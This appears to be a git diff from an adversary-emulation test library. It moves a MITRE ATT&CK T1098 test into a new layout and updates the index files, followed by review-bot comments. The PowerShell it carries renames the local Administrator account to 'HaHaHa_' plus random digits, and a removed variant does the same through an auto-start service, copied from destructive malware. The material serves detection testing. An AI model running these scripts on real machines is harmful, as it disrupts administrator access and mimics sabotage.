diff --git a/Windows/Credential_Access/Account_Manipulation.md b/Windows/Credential_Access/Account_Manipulation.md deleted file mode 100644 index 98dffc9c..00000000 --- a/Windows/Credential_Access/Account_Manipulation.md +++ /dev/null 
@@ -1,62 +0,0 @@ -# Account Manipulation - -MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098) - -Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf) - -## Example 1 - -If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits. - - $x = Get-Random -Minimum 2 -Maximum 9999 - $y = Get-Random -Minimum 2 -Maximum 9999 - $z = Get-Random -Minimum 2 -Maximum 9999 - $w = Get-Random -Minimum 2 -Maximum 9999 - Write-Host HaHaHa_$x$y$z$w - - $hostname = (Get-CIMInstance CIM_ComputerSystem).Name - - $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name - - foreach($member in $fmm) { - if($member -like "*Administrator*") { - Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" - Write-Host "Successfully Renamed Administrator Account on" $hostname - } - } - -## Example 2 - -If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits. 
- - $x = Get-Random -Minimum 2 -Maximum 99 - $y = Get-Random -Minimum 2 -Maximum 99 - $z = Get-Random -Minimum 2 -Maximum 99 - $w = Get-Random -Minimum 2 -Maximum 99 - $newadmin = "HaHaHa_$x$y$z$w".ToString() - - $serviceName = "Rename Account Service" - $serviceDisplayName = "Rename Account Service" - $serviceDescription = "Rename Account Service" - $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'" - - if (Get-Service $serviceName -ErrorAction SilentlyContinue) - { - $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" - $serviceToRemove | Stop-Service - $serviceToRemove.delete() - } - else - { - "service does not exists" - } - - Write-Host "Installing service: $serviceName" - New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription - Write-Host "Installation completed: $serviceName" - - Write-Host "Trying to start new service: $serviceName" - - $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" - $serviceToStart.startservice() - Write-Host "Service started: $serviceName" diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md new file mode 100644 index 00000000..00c27157 --- /dev/null +++ b/atomics/T1098/T1098.md @@ -0,0 +1,47 @@ +# T1098 - Account Manipulation +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098) +
Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. + +Detection: Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017) + +Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity. + +Platforms: Windows + +Data Sources: Authentication logs, API monitoring, Windows event logs, Packet capture + +Permissions Required: Administrator
+ +## Atomic Tests + +- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate) + + +
+ +## Atomic Test #1 - Admin Account Manipulate +Manipulate Admin Account Name + +**Supported Platforms:** Windows + + +#### Run it with `powershell`! +``` +$x = Get-Random -Minimum 2 -Maximum 9999 +$y = Get-Random -Minimum 2 -Maximum 9999 +$z = Get-Random -Minimum 2 -Maximum 9999 +$w = Get-Random -Minimum 2 -Maximum 9999 +Write-Host HaHaHa_$x$y$z$w + +$hostname = (Get-CIMInstance CIM_ComputerSystem).Name + +$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name + +foreach($member in $fmm) { + if($member -like "*Administrator*") { + Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" + Write-Host "Successfully Renamed Administrator Account on" $hostname + } + } +``` +
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml new file mode 100644 index 00000000..43baa340 --- /dev/null +++ b/atomics/T1098/T1098.yaml @@ -0,0 +1,33 @@ +--- +attack_technique: T1098 +display_name: Account Manipulation + +atomic_tests: +- name: Admin Account Manipulate + description: | + Manipulate Admin Account Name + + supported_platforms: + - windows + + input_arguments: + + executor: + name: powershell + command: | + $x = Get-Random -Minimum 2 -Maximum 9999 + $y = Get-Random -Minimum 2 -Maximum 9999 + $z = Get-Random -Minimum 2 -Maximum 9999 + $w = Get-Random -Minimum 2 -Maximum 9999 + Write-Host HaHaHa_$x$y$z$w + + $hostname = (Get-CIMInstance CIM_ComputerSystem).Name + + $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name + + foreach($member in $fmm) { + if($member -like "*Administrator*") { + Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" + Write-Host "Successfully Renamed Administrator Account on" $hostname + } + } diff --git a/atomics/index.md b/atomics/index.md index 13510a27..7225e568 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -263,7 +263,8 @@ - [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) # credential-access -- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) +- [T1098 Account Manipulation](./T1098/T1098.md) + - Atomic Test #1: Admin Account Manipulate [windows] - [T1139 Bash History](./T1139/T1139.md) - Atomic Test #1: xxxx [linux, macos] - [T1110 Brute Force](./T1110/T1110.md) diff --git a/atomics/matrix.md b/atomics/matrix.md index 4f74ce32..630f13e9 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md 
@@ -1,7 +1,7 @@ # All Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | +| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated 
Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | 
[Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 29474339..eaa24e01 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -203,7 +203,8 @@ - [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) # credential-access -- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) +- [T1098 Account Manipulation](./T1098/T1098.md) + - Atomic Test #1: Admin Account Manipulate [windows] - [T1110 Brute Force](./T1110/T1110.md) - Atomic Test #1: Brute Force Credentials [windows] - [T1003 Credential Dumping](./T1003/T1003.md) diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 04b88a2e..878271ba 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md 
@@ -1,7 +1,7 @@ # Windows Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | +| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Exploit Public-Facing 
Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](./T1103/T1103.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Replication Through Removable 
Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
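Review bot: the deletion hunk for Windows/Credential_Access/Account_Manipulation.md drops Example 2 (the `New-Service` variant whose binary path is `wmic useraccount where name='Administrator' rename '$newadmin'`) without carrying it into atomics/T1098/T1098.yaml, so the move loses a test case; either add it as a second atomic test or state in the commit that it was dropped on purpose. The same hunk also discards the attribution `Adapted from [Operation Blockbuster](...)` and the observable the old file promised, "the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits"; both belong in the new description so a reader knows where the test came from and what to look for in the 4738-style account-change events the ATT&CK text points at.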
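Review bot: in the atomics/T1098/T1098.md hunk the match `if($member -like "*Administrator*")` compares the whole `Select Name` object (stringified as `@{Name=Administrator}`) against a wildcard, so it fires on any member of Administrators whose name merely contains "Administrator", and `Rename-LocalUser -Name $member.Name` then errors when that member is a group or a domain principal rather than a local user; compare `$member.Name -eq 'Administrator'` (or filter the associated instances to Win32_UserAccount first) so the test renames exactly the account the heading describes. The new name is also only emitted with `Write-Host HaHaHa_$x$y$z$w`; if that output is not captured there is no recorded way to restore the account, so the page should at least tell the operator to note the generated name before running.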
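Review bot: in the atomics/T1098/T1098.yaml hunk `input_arguments:` is left with no value, which YAML loads as null rather than an empty mapping; give it `{}` or drop the key, whichever the generator that produced T1098.md, index.md and the matrix files expects. The `description: |` block only repeats the test name ("Manipulate Admin Account Name"); describe what the executor does (renames the local Administrator account to `HaHaHa_` plus the random digits) and that it leaves the machine changed, since the generated markdown is what a detection engineer reads when validating the test.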